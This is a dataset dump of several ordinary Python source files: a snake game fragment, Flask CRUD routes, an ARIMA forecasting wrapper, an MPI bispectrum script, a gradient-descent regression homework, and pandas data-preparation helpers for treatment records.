update_hall_of_fame(game_status[Status.SCORE])\n print_hall_of_fame(enter_hall_of_fame, game_status[Status.SCORE], screen, hall_of_fame_font, image_dict)\n reset_snakes(snakes)\n game_status = get_new_game_status()\n\n if cur_snake.get_head_position() == food.position:\n cur_snake.length += 1\n game_status[Status.SCORE] = game_status[Status.SCORE] + (food.get_nutrition_value() * game_status[Status.SCORE_FACTOR])\n food = random.choice([Apple(), Banana()])\n power_up = handle_power_up(power_up, snakes, cur_snake, game_status)\n _draw_everthing_on_screen(power_up, snakes, game_status, food, surface, screen, game_font, image_dict)\n\n\n\n\n\n\n\nif __name__ == '__main__':\n main()","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":10592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"102962992","text":"from flask import request\nfrom flask_bouncer import requires, ensure\n\nfrom app.constants import CREATE, READ, UPDATE, DELETE, LIST\nfrom app.factory import APIResult\nfrom app.decorators import validate_with, paginate\n\nfrom app.deals import deals\nfrom app.deals.models import Deal\nfrom app.deals.schema import create_deal, update_deal\n\n\n@deals.route('/', methods=['POST'])\n@requires(CREATE, Deal)\n@validate_with(create_deal)\ndef create():\n deal = Deal()\n deal.import_data(request.method, request.get_json())\n deal.save()\n return APIResult({'self_url': deal.get_url()}, 201, Link=deal.get_url())\n\n\n@deals.route('/', methods=['GET'])\n@requires(READ, Deal)\ndef read(id):\n deal = Deal.query.get_or_404(id)\n ensure(READ, deal)\n return APIResult(deal.export_data())\n\n\n@deals.route('/', methods=['PUT'])\n@requires(UPDATE, Deal)\n@validate_with(update_deal)\ndef update(id):\n deal = Deal.query.get_or_404(id)\n ensure(UPDATE, deal)\n deal.import_data(request.method, request.get_json())\n deal.save()\n return APIResult({'self_url': deal.get_url()})\n\n\n@deals.route('/', methods=['DELETE'])\n@requires(DELETE, Deal)\ndef delete(id):\n deal = Deal.query.get_or_404(id)\n ensure(DELETE, deal)\n deal.remove()\n return APIResult({}, 204)\n\n\n@deals.route('/', methods=['GET'])\n@requires(LIST, Deal)\n@paginate('deals')\ndef list():\n return Deal.query\n","sub_path":"api/app/deals/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"586204035","text":"import sys\nimport os.path\nimport numpy as np\nimport pandas\nimport typing\nfrom typing import List\n\nfrom Sloth import Sloth\n\nfrom d3m.primitive_interfaces.base import PrimitiveBase, CallResult\n\nfrom d3m import container, utils\nfrom d3m.metadata import hyperparams, base as metadata_base, params\n\n__author__ = 'Distil'\n__version__ = '1.0.2'\n\nInputs = container.pandas.DataFrame\nOutputs = container.List\n\nclass Params(params.Params):\n pass\n\nclass Hyperparams(hyperparams.Hyperparams):\n n_periods = hyperparams.UniformInt(lower = 1, upper = sys.maxsize, default = 18, semantic_types=[\n 'https://metadata.datadrivendiscovery.org/types/TuningParameter'])\n seasonal = hyperparams.UniformBool(default = True, semantic_types = [\n 'https://metadata.datadrivendiscovery.org/types/ControlParameter'],\n description=\"seasonal ARIMA prediction\")\n seasonal_differencing = hyperparams.UniformInt(lower = 1, upper = 365, default = 12, \n semantic_types=['https://metadata.datadrivendiscovery.org/types/TuningParameter'], \n 
description='period of seasonal differencing')\n pass\n\nclass Parrot(PrimitiveBase[Inputs, Outputs, Params, Hyperparams]):\n metadata = metadata_base.PrimitiveMetadata({\n # Simply an UUID generated once and fixed forever. Generated using \"uuid.uuid4()\".\n 'id': \"d473d487-2c32-49b2-98b5-a2b48571e07c\",\n 'version': __version__,\n 'name': \"parrot\",\n # Keywords do not have a controlled vocabulary. Authors can put here whatever they find suitable.\n 'keywords': ['Time Series'],\n 'source': {\n 'name': __author__,\n 'uris': [\n # Unstructured URIs.\n \"https://github.com/NewKnowledge/parrot-d3m-wrapper\",\n ],\n },\n # A list of dependencies in order. These can be Python packages, system packages, or Docker images.\n # Of course Python packages can also have their own dependencies, but sometimes it is necessary to\n # install a Python package first to be even able to run setup.py of another package. Or you have\n # a dependency which is not on PyPi.\n 'installation': [{\n 'type': metadata_base.PrimitiveInstallationType.PIP,\n 'package': 'cython',\n 'version': '0.28.5',\n },{\n 'type': metadata_base.PrimitiveInstallationType.PIP,\n 'package_uri': 'git+https://github.com/NewKnowledge/parrot-d3m-wrapper.git@{git_commit}#egg=ParrotD3MWrapper'.format(\n git_commit=utils.current_git_commit(os.path.dirname(__file__)),\n ),\n }],\n # The same path the primitive is registered with entry points in setup.py.\n 'python_path': 'd3m.primitives.distil.parrot',\n # Choose these from a controlled vocabulary in the schema. If anything is missing which would\n # best describe the primitive, make a merge request.\n 'algorithm_types': [\n metadata_base.PrimitiveAlgorithmType.AUTOREGRESSIVE_INTEGRATED_MOVING_AVERAGE,\n ],\n 'primitive_family': metadata_base.PrimitiveFamily.TIME_SERIES_FORECASTING,\n })\n\n def __init__(self, *, hyperparams: Hyperparams, random_seed: int = 0)-> None:\n super().__init__(hyperparams=hyperparams, random_seed=random_seed)\n self._params = {}\n self._X_train = None # training inputs\n self._arima = None # ARIMA classifier\n self._sloth = Sloth() # Sloth library \n\n def fit(self) -> None:\n \"\"\"\n Fits ARIMA model using training data from set_training_data and hyperparameters\n \"\"\"\n\n # fits ARIMA model using training data from set_training_data and hyperparameters\n self._arima = self._sloth.FitSeriesARIMA(self._X_train, \n self.hyperparams['seasonal'],\n self.hyperparams['seasonal_differencing'])\n\n def get_params(self) -> Params:\n return self._params\n\n def set_params(self, *, params: Params) -> None:\n self.params = params\n\n def set_training_data(self, *, inputs: Inputs, outputs: Outputs) -> None:\n \"\"\"\n Set primitive's training data\n\n Parameters\n ----------\n inputs : pandas data frame containing training data where first column contains dates and second column contains values\n \n \"\"\"\n self._X_train = inputs\n\n def produce(self, *, inputs: Inputs, timeout: float = None, iterations: int = None) -> CallResult[Outputs]:\n \"\"\"\n Produce primitive's prediction for future time series data\n\n Parameters\n ----------\n None\n\n Returns\n ----------\n Outputs\n The output is a list containing a forecast for each of the 'n_periods' future time periods\n \"\"\"\n\n future_forecast = self._sloth.PredictSeriesARIMA(self._arima, self.hyperparams['n_periods'])\n print(future_forecast)\n return CallResult(future_forecast)\n\nif __name__ == '__main__':\n client = Parrot(hyperparams={'n_periods':18, 'seasonal':True, 'seasonal_differencing':12})\n data = 
pandas.read_csv(\"Electronic_Production.csv\",index_col=0)\n # select training data from csv\n train = data.loc['1985-01-01':'2016-12-01']\n client.set_training_data(inputs = train, outputs = None)\n client.fit()\n results = client.produce()\n print(results)\n","sub_path":"ParrotD3MWrapper/Parrot.py","file_name":"Parrot.py","file_ext":"py","file_size_in_byte":5432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"179161176","text":"#!/usr/bin/env python\n\n# This script computes the m-averaged bispectrum b. \n# inputs: names of alm1, alm2, and alm3 files, and lmax\n\nfrom mpi4py import MPI\nimport ctypes as ct\nimport numpy as np\nimport os, sys, os.path\nimport argparse\nfrom numba import jit\n\nfrom spherical_geometry import get_hs\nfrom process_fullsky import FGS_SIM_PATH, FGS_RESULTS_PATH, PLANCK_DATA_PATH\nfrom utils import inner_loops\n\nalms_sims_path = PLANCK_DATA_PATH + 'bispectrum_alms/'\n\n# Use default communicator. No need to complicate things.\nCOMM = MPI.COMM_WORLD\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--lmax',default=200, type=int)\nparser.add_argument('--alm1',default='alm.npy')\nparser.add_argument('--alm2',default=None)\nparser.add_argument('--alm3',default=None)\nparser.add_argument('--filename',default='bispectrumtest.npy')\n\nargs = parser.parse_args()\nLMAX = args.lmax\n\nfilename = FGS_RESULTS_PATH + 'bispectra/' + args.filename\n\n# fetch alms:\nalm1 = np.load(alms_sims_path+args.alm1)\nif args.alm2 is not None:\n alm2 = np.load(alms_sims_path+args.alm2)\nelse:\n alm2 = alm1\nif args.alm3 is not None:\n alm3 = np.load(alms_sims_path+args.alm3)\nelse:\n alm3 = alm1\n\n#assert len(alm1)==len(alm2) and len(alm1)==len(alm3) and len(alm1)==LMAX+1, 'problem: alm size(s) and lmax mismatch.'\n \n# fetch w3j's for ms=(0,0,0)s\nhs = get_hs(lmax=LMAX)\n\n\ndef split(container, count):\n \"\"\"\n Simple function splitting a container into equal length chunks.\n Order is not preserved but this is potentially an advantage depending on\n the use case.\n \"\"\"\n return [container[_i::count] for _i in range(count)]\n\n#########\n##########\n###########\nN = LMAX + 1\nif COMM.rank == 0:\n ns = range(N)\n # Split into however many cores are available.\n ns = split(ns, COMM.size)\nelse:\n ns = None\n\n# Scatter jobs across cores.\nns = COMM.scatter(ns, root=0)\n\n \n#initialize bispectrum to be empty\nbispectrum = np.zeros((LMAX+1,LMAX+1,LMAX+1), dtype=complex)\n\nfor i in ns:\n print('on rank {}: i={}'.format(COMM.rank, i))\n inner_loops(i, args.lmax, bispectrum, alm1, alm2, alm3, hs=hs)\n\n# Gather results on rank 0.\nbispectrum = COMM.gather(bispectrum, root=0)\n\nif COMM.rank == 0:\n bispectrum = np.array(bispectrum).sum(axis=0)\n nonzero = ~np.isclose(hs,0.)\n bispectrum[nonzero] = bispectrum[nonzero] / hs[nonzero]\n np.save(filename,bispectrum.real)\n\n\n\n\n","sub_path":"scripts/calc_bispectrum.py","file_name":"calc_bispectrum.py","file_ext":"py","file_size_in_byte":2394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"377339657","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 10 01:23:24 2017\n\n@author: kevin\n\"\"\"\nimport csv \nimport numpy as np\nimport math\n\ndata = []\n# 每一個維度儲存一種污染物的資訊\nfor i in range(18):\n\tdata.append([])\n\nn_row = 0\ntext = open('data/train.csv', 'r', encoding='big5') \nrow = csv.reader(text , delimiter=\",\")\nfor r in row:\n # 第0列沒有資訊\n if n_row != 0:\n # 每一列只有第3-27格有值(1天內24小時的數值)\n for i in 
range(3,27):\n            if r[i] != \"NR\":\n                data[(n_row-1)%18].append(float(r[i]))\n            else:\n                data[(n_row-1)%18].append(float(0))\t\n    n_row = n_row + 1\ntext.close()\n\nnumdays = 20\nmonthPeriods = numdays * 24\nsegment = 5\ntimeSeries = monthPeriods - segment\n\nx = []\ny = []\n# for each of the 12 months\nfor i in range(12):\n    # taking 10 consecutive hours of data in one month can give 471 records\n    for j in range(timeSeries):\n        x.append([])\n        # 18 kinds of pollutants\n        for t in range(18):\n            # 9 consecutive hours\n            for s in range(segment):\n                x[timeSeries*i+j].append(data[t][monthPeriods*i+j+s])\n        y.append(data[9][monthPeriods*i+j+segment])\nx = np.array(x)\ny = np.array(y)\n\nprint(x)\n\n# add square term\nx = np.concatenate((x,x**2), axis=1)\n\nx = np.concatenate((np.ones((x.shape[0],1)),x), axis=1)\nw = np.zeros(len(x[0]))\nl_rate = 10\nrepeat = 1300000\nλ = 0.001\nx_t = x.transpose()\ns_gra = np.zeros(len(x[0]))\n\nfor i in range(repeat):\n    loss = np.dot(x,w) - y\n    RMSE = math.sqrt(np.sum(loss**2) / len(x))\n    temp1_w = w[1:]\n    temp_w = np.concatenate((np.zeros(1),temp1_w),axis=0)\n    gra = np.dot(x_t,loss) + 2 * λ * temp_w \n    \n    s_gra += gra**2\n    ada = np.sqrt(s_gra)\n    w = w - l_rate * gra/ada\n    print ('iteration: %d | Cost: %f ' % ( i,RMSE))\n    \n    \n# save model\nnp.save('all_model.npy',w)\n","sub_path":"hw1/hw1_best_trainData.py","file_name":"hw1_best_trainData.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"208953218","text":"from dal import *\n\n\ndata_pickle = 'data_model'\nmodel_pickle = 'model'\nx_model = 'X_model'\ny_model = 'Y_model'\n\n\nclass DX:\n\t# get_xy_model(False)\n\t# df = read_pickle(x_model)\n\t# cols = get_cols_alphabetically(df)\n\t#\n\t# for col in cols:\n\t# \tprint('{} = \\'{}\\''.format(col.lower(), col))\n\n\tage_num = 'AGE_NUM'\n\tage_ord = 'AGE_ORD'\n\tambu_vs_residentiel_bin = 'AMBU_VS_RESIDENTIEL_BIN'\n\tcentre_type_txt_cat = 'CENTRE_TYPE_TXT_CAT'\n\tcount_prods_num = 'COUNT_PRODS_NUM'\n\tdate_start_treat_num = 'DATE_START_TREAT_NUM'\n\teducation_level_ord = 'EDUCATION_LEVEL_ORD'\n\texist_main_prod_txt_cat = 'EXIST_MAIN_PROD_TXT_CAT'\n\tfreq_use_ord = 'FREQ_USE_ORD'\n\tinami_patient_proxy_bin = 'INAMI_PATIENT_PROXY_BIN'\n\tincome_stat_salary_proxy_bin = 'INCOME_STAT_SALARY_PROXY_BIN'\n\tincome_stat_txt_cat = 'INCOME_STAT_TXT_CAT'\n\tinjecting_stat_txt_cat = 'INJECTING_STAT_TXT_CAT'\n\tlabour_employed_proxy_bin = 'LABOUR_EMPLOYED_PROXY_BIN'\n\tlabour_interaction_proxy_bin = 'LABOUR_INTERACTION_PROXY_BIN'\n\tlabour_stat_txt_cat = 'LABOUR_STAT_TXT_CAT'\n\tlapse_treatment_firstuse_num = 'LAPSE_TREATMENT_FIRSTUSE_NUM'\n\tlapse_treatment_subst_num = 'LAPSE_TREATMENT_SUBST_NUM'\n\tlvn_children_txt_cat = 'LVN_CHILDREN_TXT_CAT'\n\tlvn_isolated_proxy_bin = 'LVN_ISOLATED_PROXY_BIN'\n\tlvn_stat_where_txt_cat = 'LVN_STAT_WHERE_TXT_CAT'\n\tlvn_stat_with_whom_txt_cat = 'LVN_STAT_WITH_WHOM_TXT_CAT'\n\tmain_prod_alcohol_bin = 'MAIN_PROD_ALCOHOL_BIN'\n\tmain_prod_cannabis_bin = 'MAIN_PROD_CANNABIS_BIN'\n\tmain_prod_cocaine_bin = 'MAIN_PROD_COCAINE_BIN'\n\tmain_prod_hallucinogens_bin = 'MAIN_PROD_HALLUCINOGENS_BIN'\n\tmain_prod_hypnotics_sedatives_bin = 'MAIN_PROD_HYPNOTICS_SEDATIVES_BIN'\n\tmain_prod_opioids_bin = 'MAIN_PROD_OPIOIDS_BIN'\n\tmain_prod_other_bin = 'MAIN_PROD_OTHER_BIN'\n\tmain_prod_stimulants_not_cocaine_bin = 'MAIN_PROD_STIMULANTS_NOT_COCAINE_BIN'\n\tmain_prod_txt_cat = 'MAIN_PROD_TXT_CAT'\n\tmain_prod_type_txt_cat = 'MAIN_PROD_TYPE_TXT_CAT'\n\tmain_prod_volatile_inhalants_bin = 'MAIN_PROD_VOLATILE_INHALANTS_BIN'\n\tniss_patient_proxy_bin = 
'NISS_PATIENT_PROXY_BIN'\n\tpat_coded_id = 'PAT_CODED_ID'\n\tprev_treat_txt_cat = 'PREV_TREAT_TXT_CAT'\n\tprod_alcohol_bin = 'PROD_ALCOHOL_BIN'\n\tprod_amphetamines_bin = 'PROD_AMPHETAMINES_BIN'\n\tprod_barbiturates_bin = 'PROD_BARBITURATES_BIN'\n\tprod_benzodiazepines_bin = 'PROD_BENZODIAZEPINES_BIN'\n\tprod_buprenorphine_bin = 'PROD_BUPRENORPHINE_BIN'\n\tprod_cannabis_bin = 'PROD_CANNABIS_BIN'\n\tprod_cocaine_bin = 'PROD_COCAINE_BIN'\n\tprod_crack_bin = 'PROD_CRACK_BIN'\n\tprod_fentanyl_bin = 'PROD_FENTANYL_BIN'\n\tprod_ghb_bin = 'PROD_GHB_BIN'\n\tprod_hallucinogens_bin = 'PROD_HALLUCINOGENS_BIN'\n\tprod_hash_bin = 'PROD_HASH_BIN'\n\tprod_heroin_bin = 'PROD_HEROIN_BIN'\n\tprod_hypnotics_bin = 'PROD_HYPNOTICS_BIN'\n\tprod_ketamine_bin = 'PROD_KETAMINE_BIN'\n\tprod_lsd_bin = 'PROD_LSD_BIN'\n\tprod_marijuana_bin = 'PROD_MARIJUANA_BIN'\n\tprod_mdma_bin = 'PROD_MDMA_BIN'\n\tprod_mephedrone_bin = 'PROD_MEPHEDRONE_BIN'\n\tprod_methadone_bin = 'PROD_METHADONE_BIN'\n\tprod_methamphetamines_bin = 'PROD_METHAMPHETAMINES_BIN'\n\tprod_opiates_bin = 'PROD_OPIATES_BIN'\n\tprod_other_cannabis_bin = 'PROD_OTHER_CANNABIS_BIN'\n\tprod_other_cocaine_bin = 'PROD_OTHER_COCAINE_BIN'\n\tprod_other_hallucinogens_bin = 'PROD_OTHER_HALLUCINOGENS_BIN'\n\tprod_other_hypnotics_bin = 'PROD_OTHER_HYPNOTICS_BIN'\n\tprod_other_opiates_bin = 'PROD_OTHER_OPIATES_BIN'\n\tprod_other_stimulants_bin = 'PROD_OTHER_STIMULANTS_BIN'\n\tprod_other_substance_bin = 'PROD_OTHER_SUBSTANCE_BIN'\n\tprod_powder_cocaine_bin = 'PROD_POWDER_COCAINE_BIN'\n\tprod_stimulants_bin = 'PROD_STIMULANTS_BIN'\n\tprod_volatile_bin = 'PROD_VOLATILE_BIN'\n\tprog_type_txt_cat = 'PROG_TYPE_TXT_CAT'\n\tprovince_txt_cat = 'PROVINCE_TXT_CAT'\n\treferral_txt_cat = 'REFERRAL_TXT_CAT'\n\treg_txt_cat = 'REG_TXT_CAT'\n\troute_admin_txt_cat = 'ROUTE_ADMIN_TXT_CAT'\n\tsex_bin = 'SEX_BIN'\n\tyear_treat_num = 'YEAR_TREAT_NUM'\n\n\nclass DY:\n\t# get_xy_model()\n\t# df = read_pickle(y_model)\n\t#\n\t# cols = get_cols_alphabetically(df)\n\t#\n\t# for col in cols:\n\t# \tprint('{} = \\'{}\\''.format(col.lower(), col))\n\n\tage_first_injection_chk_bin = 'AGE_FIRST_INJECTION_CHK_BIN'\n\tage_first_injection_chk_num = 'AGE_FIRST_INJECTION_CHK_NUM'\n\tage_first_use_chk_bin = 'AGE_FIRST_USE_CHK_BIN'\n\tage_first_use_chk_num = 'AGE_FIRST_USE_CHK_NUM'\n\tage_subst_num = 'AGE_SUBST_NUM'\n\tcentre_commune = 'CENTRE_COMMUNE'\n\tdiagnostic_ord = 'DIAGNOSTIC_ORD'\n\thosp_type_txt_cat = 'HOSP_TYPE_TXT_CAT'\n\tinjecting_stat_txt_cat = 'INJECTING_STAT_TXT_CAT'\n\tlast_inject_txt_cat = 'LAST_INJECT_TXT_CAT'\n\tlast_share_para_txt_cat = 'LAST_SHARE_PARA_TXT_CAT'\n\tlast_share_syringes_txt_cat = 'LAST_SHARE_SYRINGES_TXT_CAT'\n\tshare_para_proxy_bin = 'SHARE_PARA_PROXY_BIN'\n\tshare_syringes_proxy_bin = 'SHARE_SYRINGES_PROXY_BIN'\n\tsubst_treat_txt_cat = 'SUBST_TREAT_TXT_CAT'\n\n\ndef get_cols_w_lookups():\n\t\"\"\"Get columns with list and description details\"\"\"\n\tdf = pd.DataFrame(list(the_cols), columns=[var_used])\n\tdf = df.merge(the_vars, left_on=var_used, right_on=var_name, how='left', copy=False)\n\tdf = df.dropna()\n\treturn df\n\n\ndef get_cols_wo_data():\n\t\"\"\"List the columns with missing data and the percentage it represents\"\"\"\n\ttotal_count = len(the_data)\n\t# -- get count\n\tthe_data_count = pd.DataFrame(the_data.count(), columns=[col_count])\n\t# -- get percentage\n\tthe_data_count[col_percent_na] = the_data_count[col_count] / total_count\n\t# -- sort from worst to best\n\tthe_data_count = the_data_count.sort_values(by=[col_percent_na])\n\t# -- format as 
percentage\n\tthe_data_count[col_percent_na] = the_data_count[col_percent_na].apply(as_percent)\n\n\tprint(the_data_count[the_data_count[col_count] < total_count])\n\n\ndef get_cols_wo_data_per_year():\n\t\"\"\"list the columns with missing data and the percentage it represents\"\"\"\n\ttotal_count = len(the_data)\n\t# -- get count\n\tthe_data_count = pd.DataFrame(the_data.count(), columns=[col_count])\n\t# -- get percentage\n\tthe_data_count[col_percent_na] = the_data_count[col_count] / total_count\n\t# -- sort from worst to best\n\tthe_data_count = the_data_count.sort_values(by=[col_percent_na])\n\t# -- format as percentage\n\tthe_data_count[col_percent_na] = the_data_count[col_percent_na].apply(as_percent)\n\n\tprint(the_data_count[the_data_count[col_count] < total_count])\n\n\ndef get_response_rate_by_col_per_yr(df):\n\t\"\"\"Get encoding percentage by column\"\"\"\n\tdf = df.groupby([DV.year_treat_num]).count().transpose()\n\tfor col in df.columns:\n\t\t# -- print(col, col_max)\n\t\tcol_max = df[col].max()\n\t\tdf[col] = (df[col] / col_max)\n\n\treturn df\n\n\ndef get_col_response_rate(col, df):\n\tdf = get_response_rate_by_col_per_yr(df)\n\tyr_response_rate = df.ix[col]\n\tprint(yr_response_rate)\n\n\ndef get_best_response_rate_by_col(df):\n\tdf = get_response_rate_by_col_per_yr(df)\n\tdf[col_total] = df.sum(axis=1)\n\tdf = df.sort_values(by=[col_total], ascending=False)\n\tdf = df[df[col_total] == 5]\n\treturn merge_with_vars(df)\n\n\ndef get_worst_response_rate_by_col(df):\n\tdf = get_response_rate_by_col_per_yr(df)\n\tdf[col_total] = df.sum(axis=1)\n\tdf = df.sort_values(by=[col_total])\n\tdf = df[df[col_total] < 5]\n\treturn merge_with_vars(df)\n\n\ndef merge_with_vars(df):\n\tdf[var_used] = df.index\n\tdf = df.merge(the_vars, left_on=var_used, right_on=var_name, how='left', copy=False)\n\tdf = df.drop(col_total, 1)\n\tdf = drop_columns(col_to_drop_from_var_list, df)\n\tdf = df.drop(col_to_drop_from_var_list, 1)\n\treturn df\n\n\ndef get_pivot_by_yrs_indexes_var(col, pivot_rows):\n\t# -- get_col_response_rate(col)\n\t# -- col = 'CD_NATIONALITY_FR'\n\t# -- col = 'CD_REG'\n\tthe_data_pivoted = pd.DataFrame()\n\n\tif len(col) > 3:\n\t\tcol_li_num = left(col, len(col) - 3)\n\t\tif col not in pivot_rows:\n\t\t\tprint(col, col not in pivot_rows)\n\t\t\tif col_li_num in the_cols:\n\t\t\t\tcols = [col_li_num, col]\n\t\t\telse:\n\t\t\t\tcols = [col]\n\n\t\t\tthe_data_cols = the_data[cols + pivot_rows].sort_values(DV.age_fr_ord)\n\t\t\tthe_data_cols[col] = the_data_cols[col].fillna('N/A')\n\n\t\t\t# -- the_data_cols.head(100)\n\t\t\t# -- the_data_cols.shape\n\t\t\t# -- the_data_cols.columns\n\t\t\t# -- type(col_pivots_indexes)\n\t\t\t# -- the_data_cols.columns\n\t\t\t# -- DV.year_treat_num in the_cols\n\n\t\t\tthe_data_pivoted = pd.pivot_table(the_data_cols, index=pivot_rows, columns=cols, aggfunc=len, fill_value=0, margins=True,\n\t\t\t margins_name=col_total)\n\t\t# -- print(the_data_pivoted.head(30))\n\n\t\t# -- tmp_pvt = the_data_pivoted\n\t\t# -- the_data_pivoted.head(10)\n\telse:\n\t\tprint(col)\n\n\treturn the_data_pivoted\n\n\ndef save_data_model():\n\tdf = get_data_model()\n\tsave_as_pickle(df, data_pickle)\n\n\ndef get_data_model():\n\tdf = the_data\n\tget_cols_alphabetically(df)\n\t# get_cols_with_suffix(df, '_CAT')\n\t# df[DV.type_patient_txt_id]\n\n\tdf = remove_col_with_prefix(df, '__')\n\tdf = remove_col_with_prefix(df, 'TX_')\n\tdf = remove_col_with_prefix(df, 'START_TREAT_DATE')\n\tdf = remove_col_with_suffix(df, '_TXT_ORD')\n\tcol_replace_in_name(df, '_TXT_CAT', 
'_TXT_CAT_TMP')\n\tdf = remove_col_with_suffix(df, '_CAT')\n\tdf = remove_col_with_suffix(df, '_TXT_BIN')\n\tcol_replace_in_name(df, '_TXT_CAT_TMP', '_TXT_CAT')\n\tdf = remove_col_with_prefix(df, 'TYPE_PATIENT_')\n\tdf = remove_col_with_suffix(df, '_CENT_ID')\n\tdf = remove_col_with_suffix(df, 'CENT_REGIST_ID')\n\tdf = remove_col_with_suffix(df, 'PATIENT_ID')\n\tdf = remove_col_with_suffix(df, 'EPISODE_ID')\n\t# df = remove_col_with_suffix(df, 'SITE_ID')\n\tdf = remove_col_with_suffix(df, 'USER_ID')\n\n\treturn df\n\n\ndef get_clean_data_model(from_pickle=True):\n\tif from_pickle:\n\t\tprint(BCOLORS.WARNING + 'from pickle file:', data_pickle + BCOLORS.ENDC)\n\t\tdf = read_pickle(data_pickle)\n\telse:\n\t\tprint(BCOLORS.WARNING + 'from data_info' + BCOLORS.ENDC)\n\t\tdf = get_data_model()\n\t\tdf = reorder_col_alphabetically(df)\n\t\tget_cols_alphabetically(df)\n\t\tsave_as_pickle(df, data_pickle)\n\t\tsave_as_xlsx(df, data_pickle, 5)\n\n\t# get_unique_rows_by_column(df)\n\n\t# -- complete columns with missing data\n\t# ------------------------------------------------------------------------------------\n\tdf[DV.income_stat_txt_cat] = df[DV.income_stat_txt_cat].fillna('Inconnu')\n\tdf[DV.injecting_stat_txt_cat] = df[DV.injecting_stat_txt_cat].fillna('Inconnu')\n\tdf[DV.lvn_children_txt_cat] = df[DV.lvn_children_txt_cat].fillna('Inconnu')\n\tdf[DV.lvn_stat_where_txt_cat] = df[DV.lvn_stat_where_txt_cat].fillna('Inconnu')\n\tdf[DV.lvn_stat_with_whom_txt_cat] = df[DV.lvn_stat_with_whom_txt_cat].fillna('Inconnu')\n\tdf[DV.main_prod_type_txt_cat] = df[DV.main_prod_type_txt_cat].fillna('N/A')\n\tdf[DV.main_prod_txt_cat] = df[DV.main_prod_txt_cat].fillna('N/A')\n\tdf[DV.prev_treat_txt_cat] = df[DV.prev_treat_txt_cat].fillna('Inconnu')\n\tdf[DV.prog_type_txt_cat] = df[DV.prog_type_txt_cat].fillna('Autre')\n\tdf[DV.province_txt_cat] = df[DV.province_txt_cat].fillna('Autre')\n\tdf[DV.prog_type_txt_cat] = df[DV.prog_type_txt_cat].fillna('Autre')\n\tdf[DV.referral_txt_cat] = df[DV.referral_txt_cat].fillna('Inconnu')\n\tdf[DV.reg_txt_cat] = df[DV.reg_txt_cat].fillna('Inconnu')\n\tdf[DV.route_admin_txt_cat] = df[DV.route_admin_txt_cat].fillna('Inconnu')\n\n\t# -- drop remaining missing data row\n\t# ------------------------------------------------------------------------------------\n\tdf = remove_values([-1], DV.age_num, df)\n\tdf = remove_values([0, 99], DV.education_level_ord, df)\n\tdf = remove_values([99], DV.freq_use_ord, df)\n\n\treturn df\n\n\ndef get_xy_model(from_pickle=True):\n\tif from_pickle:\n\t\tprint(BCOLORS.WARNING + 'from pickle file:', data_pickle + BCOLORS.ENDC)\n\t\tdf_X = read_pickle(x_model)\n\t\tdf_Y = read_pickle(y_model)\n\telse:\n\t\tprint(BCOLORS.WARNING + 'from data_info' + BCOLORS.ENDC)\n\n\t\tdf = get_clean_data_model(False)\n\t\tget_cols_alphabetically(df)\n\t\t# cols = get_non_numerical_cols(df)\n\t\t# drop_columns(df, cols)\n\t\tcols_X = [DV.age_num,\n\t\t DV.age_ord,\n\t\t DV.ambu_vs_residentiel_bin,\n\t\t DV.centre_type_txt_cat,\n\t\t DV.count_prods_num,\n\t\t DV.date_start_treat_num,\n\t\t DV.education_level_ord,\n\t\t DV.exist_main_prod_txt_cat,\n\t\t DV.freq_use_ord,\n\t\t DV.inami_patient_proxy_bin,\n\t\t DV.income_stat_txt_cat,\n\t\t DV.income_stat_salary_proxy_bin,\n\t\t DV.injecting_stat_txt_cat,\n\t\t DV.labour_employed_proxy_bin,\n\t\t DV.labour_interaction_proxy_bin,\n\t\t DV.labour_stat_txt_cat,\n\t\t DV.lapse_treatment_firstuse_num,\n\t\t DV.lapse_treatment_subst_num,\n\t\t DV.lvn_children_txt_cat,\n\t\t DV.lvn_stat_where_txt_cat,\n\t\t 
DV.lvn_stat_with_whom_txt_cat,\n\t\t DV.lvn_isolated_proxy_bin,\n\t\t DV.main_prod_type_txt_cat,\n\t\t DV.main_prod_txt_cat,\n\t\t DV.niss_patient_proxy_bin,\n\t\t DV.prev_treat_txt_cat,\n\t\t DV.pat_coded_id,\n\t\t DV.prog_type_txt_cat,\n\t\t DV.province_txt_cat,\n\t\t DV.referral_txt_cat,\n\t\t DV.reg_txt_cat,\n\t\t DV.route_admin_txt_cat,\n\t\t DV.sex_bin,\n\t\t DV.year_treat_num]\n\n\t\tcol_prods = get_cols_with_prefix_suffix(df, 'PROD_', '_BIN')\n\t\tcol_main_prods = get_cols_with_prefix_suffix(df, 'MAIN_PROD', '_BIN')\n\n\t\tcols_X = cols_X + col_prods + col_main_prods\n\n\t\t# -- Addition use for Y analysis\n\t\tcols_Y = [DV.age_first_use_chk_bin,\n\t\t DV.age_first_use_chk_num,\n\t\t DV.age_first_injection_chk_bin,\n\t\t DV.age_first_injection_chk_num,\n\t\t DV.age_subst_num,\n\t\t DV.centre_commune,\n\t\t DV.diagnostic_ord,\n\t\t DV.hosp_type_txt_cat,\n\t\t DV.injecting_stat_txt_cat,\n\t\t DV.last_inject_txt_cat,\n\t\t DV.last_share_syringes_txt_cat,\n\t\t DV.last_share_para_txt_cat,\n\t\t DV.share_para_proxy_bin,\n\t\t DV.share_syringes_proxy_bin,\n\t\t DV.subst_treat_txt_cat]\n\n\t\tcols_selected = sorted(list(set(cols_X + cols_Y)))\n\t\tdf = df[cols_selected]\n\n\t\tsave_as_pickle(df, model_pickle)\n\n\t\tdf_X = df[cols_X]\n\t\tdf_Y = df[cols_Y]\n\n\t\tsave_as_pickle(df_X, x_model)\n\t\tsave_as_pickle(df_Y, y_model)\n\t\tsave_as_xlsx(df_X, x_model, 5)\n\t\tsave_as_xlsx(df_Y, y_model, 5)\n\n\treturn df_X, df_Y\n\n\n\n\n\n\n\n","sub_path":"model_data.py","file_name":"model_data.py","file_ext":"py","file_size_in_byte":13764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} 